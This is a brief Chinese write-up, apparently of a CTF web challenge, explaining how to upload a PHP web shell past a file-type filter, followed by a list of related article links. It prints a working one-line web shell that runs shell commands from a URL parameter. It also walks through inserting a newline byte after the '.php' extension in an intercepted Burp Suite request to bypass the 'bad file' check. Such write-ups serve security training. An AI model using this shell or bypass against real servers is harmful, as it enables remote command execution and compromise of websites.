Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
TG:@yunlaoda360 云老大12 分钟前
如何了解腾讯云国际站代理商FL有什么跨境优势呢?飞Link1 小时前
GDN:深度学习时代的图偏差网络异常检测全解析小白勇闯网安圈2 小时前
supersqli、web2、fileclude、Web_python_template_injection哈哈哈笑什么2 小时前
SpringBoot 企业级接口加密【通用、可配置、解耦的组件】「开闭原则+模板方法+拦截器/中间件模式」破刺不会编程2 小时前
socket编程TCPBullSmall2 小时前
日志打印IP:安全与合规的最佳实践白帽子黑客罗哥3 小时前
零基础转行渗透测试 系统的学习流程(非常详细)介一安全3 小时前
【Frida Android】实战篇13:企业常用非对称加密场景 Hook 教程Suckerbin4 小时前
Gaara: 1靶场渗透易天ETU4 小时前
短距离光模块 COB 封装与同轴工艺的区别有哪些